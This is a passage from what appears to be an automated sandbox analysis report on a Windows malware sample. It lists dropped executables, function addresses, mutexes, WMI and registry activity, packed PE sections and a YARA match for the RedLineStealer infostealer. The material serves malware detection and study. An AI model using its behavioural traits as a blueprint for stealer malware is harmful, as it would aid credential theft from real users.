Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C516BE0	2_2_6C516BE0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4B0BA0	2_2_6C4B0BA0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C428460	2_2_6C428460
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C474420	2_2_6C474420
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C49A430	2_2_6C49A430
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4564D0	2_2_6C4564D0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4AA4D0	2_2_6C4AA4D0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C53A480	2_2_6C53A480
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C558550	2_2_6C558550
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C468540	2_2_6C468540
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C514540	2_2_6C514540
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C472560	2_2_6C472560
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4B0570	2_2_6C4B0570
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4DA5E0	2_2_6C4DA5E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C49E5F0	2_2_6C49E5F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4045B0	2_2_6C4045B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C46C650	2_2_6C46C650
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4346D0	2_2_6C4346D0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C46E6E0	2_2_6C46E6E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4AE6E0	2_2_6C4AE6E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C490700	2_2_6C490700
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C43A7D0	2_2_6C43A7D0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C45E070	2_2_6C45E070
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4DC000	2_2_6C4DC000
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4D8010	2_2_6C4D8010
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C408090	2_2_6C408090
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4200B0	2_2_6C4200B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EC0B0	2_2_6C4EC0B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C478140	2_2_6C478140
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C486130	2_2_6C486130
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4F4130	2_2_6C4F4130
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4101E0	2_2_6C4101E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A8250	2_2_6C4A8250
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C498260	2_2_6C498260
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4DA210	2_2_6C4DA210
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4E8220	2_2_6C4E8220
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C5962C0	2_2_6C5962C0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4E22A0	2_2_6C4E22A0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4DE2B0	2_2_6C4DE2B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C418340	2_2_6C418340
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C552370	2_2_6C552370
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C412370	2_2_6C412370
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C52C360	2_2_6C52C360
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A6370	2_2_6C4A6370
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C482320	2_2_6C482320
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4643E0	2_2_6C4643E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4423A0	2_2_6C4423A0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C46E3B0	2_2_6C46E3B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C413C40	2_2_6C413C40
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C539C40	2_2_6C539C40
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C421C30	2_2_6C421C30
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C54DCD0	2_2_6C54DCD0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4D1CE0	2_2_6C4D1CE0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C473D00	2_2_6C473D00
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4E1DC0	2_2_6C4E1DC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C403D80	2_2_6C403D80
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C559D90	2_2_6C559D90
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C56BE70	2_2_6C56BE70
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C595E60	2_2_6C595E60
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C51DE10	2_2_6C51DE10
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C433EC0	2_2_6C433EC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C445F20	2_2_6C445F20
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C405F30	2_2_6C405F30
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C567F20	2_2_6C567F20
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C52DFC0	2_2_6C52DFC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C593FC0	2_2_6C593FC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4BBFF0	2_2_6C4BBFF0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C431F90	2_2_6C431F90
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C46D810	2_2_6C46D810
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C41D8E0	2_2_6C41D8E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4438E0	2_2_6C4438E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C56B8F0	2_2_6C56B8F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EF8F0	2_2_6C4EF8F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4CD960	2_2_6C4CD960
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C55F900	2_2_6C55F900
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C5920	2_2_6C4C5920
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A99C0	2_2_6C4A99C0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4499D0	2_2_6C4499D0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4759F0	2_2_6C4759F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A79F0	2_2_6C4A79F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C421980	2_2_6C421980
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4E1990	2_2_6C4E1990
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C599A50	2_2_6C599A50
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C44FA10	2_2_6C44FA10
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C50DA30	2_2_6C50DA30
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C411AE0	2_2_6C411AE0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EDAB0	2_2_6C4EDAB0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EFB60	2_2_6C4EFB60
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C45BB20	2_2_6C45BB20
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C457BF0	2_2_6C457BF0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C401B80	2_2_6C401B80
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4F5B90	2_2_6C4F5B90
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C469BA0	2_2_6C469BA0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4D9BB0	2_2_6C4D9BB0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C49D410	2_2_6C49D410
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4F9430	2_2_6C4F9430
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4114E0	2_2_6C4114E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C5914A0	2_2_6C5914A0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C55F510	2_2_6C55F510
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C477500	2_2_6C477500
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C425510	2_2_6C425510
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4955F0	2_2_6C4955F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C449590	2_2_6C449590
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C465640	2_2_6C465640
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C429650	2_2_6C429650
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C439600	2_2_6C439600
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C487610	2_2_6C487610
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4416A0	2_2_6C4416A0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4796A0	2_2_6C4796A0
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CC5C83	3_2_00CC5C83
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CC735A	3_2_00CC735A
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00D08860	3_2_00D08860
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CC4DE0	3_2_00CC4DE0
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00DD7B6E	3_2_00DD7B6E
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CC4B30	3_2_00CC4B30

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: String function: 6C549F30 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: String function: 6C439B10 appears 109 times
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: String function: 6C46C5E0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: String function: 6C433620 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: String function: 00CD80C0 appears 130 times

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 275588fe9c.exe PID: 7880, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: random.exe	Static PE information: Section: ZLIB complexity 0.9983774038461538
Source: random.exe	Static PE information: Section: xnqbglnd ZLIB complexity 0.9943292148949132
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: Section: crzarjak ZLIB complexity 0.9943190270752752
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9983023245912807
Source: skotes.exe.3.dr	Static PE information: Section: ZLIB complexity 0.9983023245912807
Source: random[2].exe.11.dr	Static PE information: Section: vhxwdqgr ZLIB complexity 0.9902791506456762
Source: fee976e9bb.exe.11.dr	Static PE information: Section: vhxwdqgr ZLIB complexity 0.9902791506456762
Source: random[3].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9985649294969512
Source: random[3].exe.11.dr	Static PE information: Section: mzomafvq ZLIB complexity 0.994594894431988
Source: f64eac2185.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9985649294969512
Source: f64eac2185.exe.11.dr	Static PE information: Section: mzomafvq ZLIB complexity 0.994594894431988
Source: random[1].exe0.11.dr	Static PE information: Section: ZLIB complexity 0.9986602038871951
Source: random[1].exe0.11.dr	Static PE information: Section: fihicggg ZLIB complexity 0.9944735573322349
Source: 1cfdc82c16.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9986602038871951
Source: 1cfdc82c16.exe.11.dr	Static PE information: Section: fihicggg ZLIB complexity 0.9944735573322349
Source: random[1].exe1.11.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: random[1].exe1.11.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: 275588fe9c.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: 275588fe9c.exe.11.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: random[1].exe2.11.dr	Static PE information: Section: ZLIB complexity 0.9984254807692308
Source: random[1].exe2.11.dr	Static PE information: Section: hyfxsejb ZLIB complexity 0.9945094758985684
Source: 0436fcd702.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9984254807692308
Source: 0436fcd702.exe.11.dr	Static PE information: Section: hyfxsejb ZLIB complexity 0.9945094758985684
Source: random[2].exe0.11.dr	Static PE information: Section: crzarjak ZLIB complexity 0.9943190270752752
Source: 48b7eec64e.exe.11.dr	Static PE information: Section: crzarjak ZLIB complexity 0.9943190270752752
Source: random[3].exe0.11.dr	Static PE information: Section: ZLIB complexity 0.9973657431722689
Source: random[3].exe0.11.dr	Static PE information: Section: kcpsgwpt ZLIB complexity 0.9938230248516321
Source: 071b4af2c1.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9973657431722689
Source: 071b4af2c1.exe.11.dr	Static PE information: Section: kcpsgwpt ZLIB complexity 0.9938230248516321
Source: tmpE345.tmp.14.dr	Static PE information: Section: ZLIB complexity 0.9983774038461538
Source: tmpE345.tmp.14.dr	Static PE information: Section: xnqbglnd ZLIB complexity 0.9943292148949132
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: Section: crzarjak ZLIB complexity 0.9943190270752752
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: Section: ZLIB complexity 0.9983023245912807
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: Section: ZLIB complexity 0.9983023245912807

Source: random[1].exe1.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 275588fe9c.exe.11.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@106/161@73/28

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C470300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

2_2_6C470300

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\KMZ50S4H.htm

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:120:WilError_03

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186062529.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2180558881.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
